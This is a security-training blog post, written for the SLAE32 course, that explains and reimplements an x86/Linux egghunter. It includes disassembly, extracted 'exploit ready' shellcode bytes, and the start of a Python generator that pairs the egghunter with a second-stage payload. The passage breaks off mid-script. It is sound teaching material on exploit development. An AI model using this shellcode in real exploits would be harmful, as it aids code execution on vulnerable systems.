<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>SLAE32: Implementing an x86/Linux Egghunter | Travis Mathison</title><meta name="generator" content="Jekyll v4.1.1" /><meta property="og:title" content="SLAE32: Implementing an x86/Linux Egghunter" /><meta name="author" content="Travis Mathison" /><meta property="og:locale" content="en_US" /><meta name="description" content="The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE-990" /><meta property="og:description" content="The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE-990" /><link rel="canonical" href="https://tdmathison.github.io/posts/slae32-3/" /><meta property="og:url" content="https://tdmathison.github.io/posts/slae32-3/" /><meta property="og:site_name" content="Travis Mathison" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2018-01-04T20:00:00-08:00" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@type":"BlogPosting","headline":"SLAE32: Implementing an x86/Linux Egghunter","dateModified":"2018-01-04T20:00:00-08:00","datePublished":"2018-01-04T20:00:00-08:00","url":"https://tdmathison.github.io/posts/slae32-3/","mainEntityOfPage":{"@type":"WebPage","@id":"https://tdmathison.github.io/posts/slae32-3/"},"author":{"@type":"Person","name":"Travis Mathison"},"description":"The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE-990","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/profile.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">Travis Mathison</a></div><div class="site-subtitle font-italic">Malware Reverse Engineering and Incident Response.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/tdmathison" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a> <a href="https://www.linkedin.com/in/travismathison" target="_blank"> <i class="fab fa-linkedin"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>SLAE32: Implementing an x86/Linux Egghunter</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>SLAE32: Implementing an x86/Linux Egghunter</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Thu, Jan 4, 2018, 8:00 PM -0800" > Jan 4, 2018 <i class="unloaded">2018-01-04T20:00:00-08:00</i> </span> by <span class="author"> Travis Mathison </span></div></div><div class="post-content"><h3 id="the-blog-post-has-been-created-for-completing-the-requirements-of-the-securitytube-linux-assembly-expert-certification">The blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:</h3><p><a href="http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/">http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/</a><br /> Student ID: SLAE-990</p><p>Assignment #3</p><hr /><h2 id="goals">Goals</h2><ul><li>Explain what an egghunter is</li><li>Create a working demo</li><li>Configurable:<ul><li>Be able to specify the egg value and second stage payload</li><li>The egghunter shellcode will be generated to search for this egg</li><li>Two shellcodes are emmitted; one for the egghunter and one for the second stage payload prefixed with the egg</li></ul></li></ul><h2 id="what-is-an-egghunter">What is an egghunter?</h2><p>An egghunter is shellcode that crawls the processes Virtual Address Space (VAS) for another piece of shellcode to execute. The search by default would occur from the location of the egghunter code onward searching each byte for a 4 or 8 byte “egg” to indicate where the next payload to execute is at.</p><p>The egghunter technique is used when there is not enough room for a full payload in the space that was exploitable in the application. Further, there must be some way to inject the second stage payload into the applications memory space. This could be through an additional header if it was a web request, or it could be simply making another call to a command somewhere else in the application where the data was persisted in memory.</p><p>In all cases, this means that in our exploit where we took control of EIP there was not a way to jump to the suitable location.</p><h3 id="existing-egghunters">Existing egghunters</h3><p>A well-known writeup on creating egghunters is by Skape at <a href="http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf">http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf</a> and it is a popular read for those interested in implementing an egghunter. The focus of this post is on the x86/Linux egghunters only.</p><p>There are two important things for an egghunter to function properly:</p><ul><li>It must find our shellcode wherever it is in memory and run it</li><li>It must avoid crashing due to unreadable memory locations, that is, it must check whether it has access to each block of memory before testing it for the egg bytes</li></ul><h3 id="conditions-of-the-egg">Conditions of the egg</h3><h4 id="size">Size</h4><p>The egg can be either 4 or 8 bytes and it seems the best size is 8 bytes. The primary reasoning behind this which makes the most sense is that the egghunter shellcode will have the first 4 bytes in it since it needs to search for the egg. If the egghunter ends up running into itself it can incorrectly believe it has found the egg when it has not.</p><p>The egg should be the same 4 bytes duplicated.</p><h4 id="value">value</h4><p>A standard value used is 57303054 but other values such as 90509050 are also used. The main consideration is using something that is unlikely to be present in the actual program as well as something that has benign instructions associated with it. Depending on the egghunter it may end up executing the instructions or may jump over it completely.</p><p>Both of these could run without causing much problem as they only contain pushes, NOP’s, and a XOR. If jumps or other instructions were generated it could be problematic.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>EGG = 57303054
0:  57                      push   edi
1:  30 30                   xor    BYTE PTR [eax],dh
3:  54                      push   esp
</pre></table></code></div></div><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>EGG = 90509050
0:  90                      nop
1:  50                      push   eax
2:  90                      nop
3:  50                      push   eax
</pre></table></code></div></div><h3 id="implementation">Implementation</h3><p>Since there are highly optimized versions of the egghunter available we’ll focus on analyzing one that is best used for our situation and understand each line of assembly. We will then create a working demo of the egghunter and see it actually work in practice.</p><p>The following implementation utilizes the <strong>access</strong> system call to determine if a block of memory is invalid or not. This implementation also does not execute the egg instructions so that is not a concern either.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre><span class="err">00000000</span>  <span class="err">31</span><span class="nf">D2</span>              <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">00000002</span>  <span class="err">6681</span><span class="nf">CAFF0F</span>        <span class="nv">or</span> <span class="nb">dx</span><span class="p">,</span><span class="mh">0xfff</span>
<span class="err">00000007</span>  <span class="err">42</span>                <span class="nf">inc</span> <span class="nb">edx</span>
<span class="err">00000008</span>  <span class="err">8</span><span class="nf">D5A04</span>            <span class="nv">lea</span> <span class="nb">ebx</span><span class="p">,[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x4</span><span class="p">]</span>
<span class="err">0000000</span><span class="nf">B</span>  <span class="mi">6</span><span class="nv">A21</span>              <span class="nv">push</span> <span class="kt">byte</span> <span class="o">+</span><span class="mh">0x21</span>
<span class="err">0000000</span><span class="nf">D</span>  <span class="mi">58</span>                <span class="nv">pop</span> <span class="nb">eax</span>
<span class="err">0000000</span><span class="nf">E</span>  <span class="nv">CD80</span>              <span class="nv">int</span> <span class="mh">0x80</span>
<span class="err">00000010</span>  <span class="err">3</span><span class="nf">CF2</span>              <span class="nv">cmp</span> <span class="nb">al</span><span class="p">,</span><span class="mh">0xf2</span>
<span class="err">00000012</span>  <span class="err">74</span><span class="nf">EE</span>              <span class="nv">jz</span> <span class="mh">0x2</span>
<span class="err">00000014</span>  <span class="nf">B890509050</span>        <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0x50905090</span>
<span class="err">00000019</span>  <span class="err">89</span><span class="nf">D7</span>              <span class="nv">mov</span> <span class="nb">edi</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000001</span><span class="nf">B</span>  <span class="nv">AF</span>                <span class="nv">scasd</span>
<span class="err">0000001</span><span class="nf">C</span>  <span class="mi">75</span><span class="nv">E9</span>              <span class="nv">jnz</span> <span class="mh">0x7</span>
<span class="err">0000001</span><span class="nf">E</span>  <span class="nv">AF</span>                <span class="nv">scasd</span>
<span class="err">0000001</span><span class="nf">F</span>  <span class="mi">75</span><span class="nv">E6</span>              <span class="nv">jnz</span> <span class="mh">0x7</span>
<span class="err">00000021</span>  <span class="nf">FFE7</span>              <span class="nv">jmp</span> <span class="nb">edi</span>
</pre></table></code></div></div><h4 id="breaking-down-the-assembly">Breaking down the assembly</h4><p>The edx register is zeroed out as it will be tracking the memory locations that we’ll be comparing our egg with. When we find it we will jump to EDI where the shellcode should reside.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="err">00000000</span>  <span class="err">31</span><span class="nf">D2</span>              <span class="nv">xor</span> <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>
</pre></table></code></div></div><p>The next two instructions will allow us to move up a full PAGE_SIZE. When we check for access, it will apply for the entire memory segment so if it fails then there is no need to continue check bytes. On my system, I checked the page size via the command <code class="language-plaintext highlighter-rouge">getconf PAGE_SIZE</code> which yielded <code class="language-plaintext highlighter-rouge">4096</code> which is why <code class="language-plaintext highlighter-rouge">0xfff</code> would make sense.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="err">00000002</span>  <span class="err">6681</span><span class="nf">CAFF0F</span>        <span class="nv">or</span> <span class="nb">dx</span><span class="p">,</span><span class="mh">0xfff</span>
<span class="err">00000007</span>  <span class="err">42</span>                <span class="nf">inc</span> <span class="nb">edx</span>
</pre></table></code></div></div><p>We are loading the effective address of edx plus 4 bytes into ebx. This is in preparation of the upcoming <strong>access</strong> check which will be performed against this memory location.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="err">00000008</span>  <span class="err">8</span><span class="nf">D5A04</span>            <span class="nv">lea</span> <span class="nb">ebx</span><span class="p">,[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x4</span><span class="p">]</span>
</pre></table></code></div></div><p>The system call for <strong>access</strong> is 33 so the hex conversion of this is 0x21 of which we push to the stack and immediately pop back onto eax to prepare for the system call.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="err">0000000</span><span class="nf">B</span>  <span class="mi">6</span><span class="nv">A21</span>              <span class="nv">push</span> <span class="kt">byte</span> <span class="o">+</span><span class="mh">0x21</span>
<span class="err">0000000</span><span class="nf">D</span>  <span class="mi">58</span>                <span class="nv">pop</span> <span class="nb">eax</span>
<span class="err">0000000</span><span class="nf">E</span>  <span class="nv">CD80</span>              <span class="nv">int</span> <span class="mh">0x80</span>
</pre></table></code></div></div><p>The result of the <strong>access</strong> check is compared with 0xf2 which is the low byte of the EFAULT return value (the address points outside of the accessible address space). If the value matches then we don’t have access to this memory page and should skip over it; thus we jump back to the second instruction of the egghunter which moves us a page ahead.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="err">00000010</span>  <span class="err">3</span><span class="nf">CF2</span>              <span class="nv">cmp</span> <span class="nb">al</span><span class="p">,</span><span class="mh">0xf2</span>
<span class="err">00000012</span>  <span class="err">74</span><span class="nf">EE</span>              <span class="nv">jz</span> <span class="mh">0x2</span>
</pre></table></code></div></div><p>At this point we load the egg value into eax, and move edx into edi (which allows for the use of the scasd instruction which compares eax with dword at edi then set status flags).</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="err">00000014</span>  <span class="nf">B890509050</span>        <span class="nv">mov</span> <span class="nb">eax</span><span class="p">,</span><span class="mh">0x50905090</span>
<span class="err">00000019</span>  <span class="err">89</span><span class="nf">D7</span>              <span class="nv">mov</span> <span class="nb">edi</span><span class="p">,</span><span class="nb">edx</span>
<span class="err">0000001</span><span class="nf">B</span>  <span class="nv">AF</span>                <span class="nv">scasd</span>
</pre></table></code></div></div><p>If there is no match then it jumps back to increment edx to check the next the next 4 bytes. If it does match then it does a second check of the next 4 bytes after the match to see if we have the full 8 byte egg.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="err">0000001</span><span class="nf">C</span>  <span class="mi">75</span><span class="nv">E9</span>              <span class="nv">jnz</span> <span class="mh">0x7</span>
<span class="err">0000001</span><span class="nf">E</span>  <span class="nv">AF</span>                <span class="nv">scasd</span>
<span class="err">0000001</span><span class="nf">F</span>  <span class="mi">75</span><span class="nv">E6</span>              <span class="nv">jnz</span> <span class="mh">0x7</span>
</pre></table></code></div></div><p>Finally, upon a successful match, edi should be now pointing to the first byte of the second stage payload. We jump to that location to allow execution of the second stage payload.</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="err">00000021</span>  <span class="nf">FFE7</span>              <span class="nv">jmp</span> <span class="nb">edi</span>
</pre></table></code></div></div><h2 id="creating-a-working-demo">Creating a working demo</h2><p>I have re-written the egghunter to have labels to jump to when we move to next memory page or next byte. An objdump of the assembly is shown below:</p><div class="language-nasm highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre><td class="rouge-code"><pre><span class="nl">egghunter:</span>     <span class="nf">file</span> <span class="nv">format</span> <span class="nv">elf32</span><span class="o">-</span><span class="nv">i386</span>


<span class="nf">Disassembly</span> <span class="nv">of</span> <span class="nv">section</span> <span class="nv">.text</span><span class="p">:</span>

<span class="err">08048060</span> <span class="err">&lt;</span><span class="nf">_start</span><span class="o">&gt;</span><span class="p">:</span>
 <span class="err">8048060:</span>	<span class="err">31</span> <span class="nf">d2</span>                	<span class="nv">xor</span>    <span class="nb">edx</span><span class="p">,</span><span class="nb">edx</span>

<span class="err">08048062</span> <span class="err">&lt;</span><span class="nf">next_page</span><span class="o">&gt;</span><span class="p">:</span>
 <span class="err">8048062:</span>	<span class="err">66</span> <span class="err">81</span> <span class="nf">ca</span> <span class="nv">ff</span> <span class="mi">0</span><span class="nv">f</span>       	<span class="nv">or</span>     <span class="nb">dx</span><span class="p">,</span><span class="mh">0xfff</span>

<span class="err">08048067</span> <span class="err">&lt;</span><span class="nf">next_byte</span><span class="o">&gt;</span><span class="p">:</span>
 <span class="err">8048067:</span>	<span class="err">42</span>                   	<span class="nf">inc</span>    <span class="nb">edx</span>
 <span class="err">8048068:</span>	<span class="err">8</span><span class="nf">d</span> <span class="mi">5</span><span class="nv">a</span> <span class="mi">04</span>             	<span class="nv">lea</span>    <span class="nb">ebx</span><span class="p">,[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x4</span><span class="p">]</span>
 <span class="err">804806</span><span class="nl">b:</span>	<span class="err">6</span><span class="nf">a</span> <span class="mi">21</span>                	<span class="nv">push</span>   <span class="mh">0x21</span>
 <span class="err">804806</span><span class="nl">d:</span>	<span class="err">58</span>                   	<span class="nf">pop</span>    <span class="nb">eax</span>
 <span class="err">804806</span><span class="nl">e:</span>	<span class="nf">cd</span> <span class="mi">80</span>                	<span class="nv">int</span>    <span class="mh">0x80</span>
 <span class="err">8048070:</span>	<span class="err">3</span><span class="nf">c</span> <span class="nv">f2</span>                	<span class="nv">cmp</span>    <span class="nb">al</span><span class="p">,</span><span class="mh">0xf2</span>
 <span class="err">8048072:</span>	<span class="err">74</span> <span class="nf">ee</span>                	<span class="nv">je</span>     <span class="mi">8048062</span> <span class="o">&lt;</span><span class="nv">next_page</span><span class="o">&gt;</span>
 <span class="err">8048074:</span>	<span class="nf">b8</span> <span class="mi">90</span> <span class="mi">50</span> <span class="mi">90</span> <span class="mi">50</span>       	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x50905090</span>
 <span class="err">8048079:</span>	<span class="err">89</span> <span class="nf">d7</span>                	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="nb">edx</span>
 <span class="err">804807</span><span class="nl">b:</span>	<span class="nf">af</span>                   	<span class="nv">scas</span>   <span class="nb">eax</span><span class="p">,</span><span class="kt">DWORD</span> <span class="nv">PTR</span> <span class="nb">es</span><span class="p">:[</span><span class="nb">edi</span><span class="p">]</span>
 <span class="err">804807</span><span class="nl">c:</span>	<span class="err">75</span> <span class="nf">e9</span>                	<span class="nv">jne</span>    <span class="mi">8048067</span> <span class="o">&lt;</span><span class="nv">next_byte</span><span class="o">&gt;</span>
 <span class="err">804807</span><span class="nl">e:</span>	<span class="nf">af</span>                   	<span class="nv">scas</span>   <span class="nb">eax</span><span class="p">,</span><span class="kt">DWORD</span> <span class="nv">PTR</span> <span class="nb">es</span><span class="p">:[</span><span class="nb">edi</span><span class="p">]</span>
 <span class="err">804807</span><span class="nl">f:</span>	<span class="err">75</span> <span class="nf">e6</span>                	<span class="nv">jne</span>    <span class="mi">8048067</span> <span class="o">&lt;</span><span class="nv">next_byte</span><span class="o">&gt;</span>
 <span class="err">8048081:</span>	<span class="nf">ff</span> <span class="nv">e7</span>                	<span class="nv">jmp</span>    <span class="nb">edi</span>
</pre></table></code></div></div><p>We can save this as exploit ready hex and define where the 4 byte “egg” is located for configurability later.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>[sengen@manjaro-x86 assignment3]$ objdump -d ./egghunter|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7"
</pre></table></code></div></div><h3 id="python-script-to-help-generate-egghunterpayload">Python script to help generate egghunter+payload</h3><p>So we can now write a quick python program to take in the egg value and any given payload and emmit the two formatted hex strings that can be used in an exploit.</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python
</span>
<span class="kn">from</span> <span class="nn">optparse</span> <span class="kn">import</span> <span class="n">OptionParser</span>

<span class="k">def</span> <span class="nf">to_hex</span><span class="p">(</span><span class="n">val</span><span class="p">):</span>
    <span class="k">return</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="s">'</span><span class="se">\\</span><span class="s">x'</span> <span class="o">+</span> <span class="n">val</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="mi">2</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">val</span><span class="p">),</span> <span class="mi">2</span><span class="p">))</span>

<span class="n">parser</span> <span class="o">=</span> <span class="n">OptionParser</span><span class="p">()</span>
<span class="n">parser</span><span class="p">.</span><span class="n">description</span> <span class="o">=</span> <span class="s">"Generates egghunter shellcode with payload."</span>
<span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-e"</span><span class="p">,</span> <span class="s">"--egg"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"egg"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"The 4 byte egg to use (e.g. 90509050)"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">)</span>
<span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-p"</span><span class="p">,</span> <span class="s">"--payload"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"payload"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"Payload shellcode (e.g. </span><span class="se">\\</span><span class="s">x31</span><span class="se">\\</span><span class="s">xc0</span><span class="se">\\</span><span class="s">...)"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">)</span>

<span class="p">(</span><span class="n">options</span><span class="p">,</span> <span class="n">args</span><span class="p">)</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">options</span><span class="p">.</span><span class="n">egg</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">options</span><span class="p">.</span><span class="n">payload</span><span class="p">:</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">print_help</span><span class="p">()</span>
    <span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="k">if</span> <span class="ow">not</span> <span class="nb">len</span><span class="p">(</span><span class="n">options</span><span class="p">.</span><span class="n">egg</span><span class="p">)</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Invalid egg size"</span><span class="p">)</span>
    <span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="n">egghunter</span> <span class="o">=</span> <span class="p">(</span>
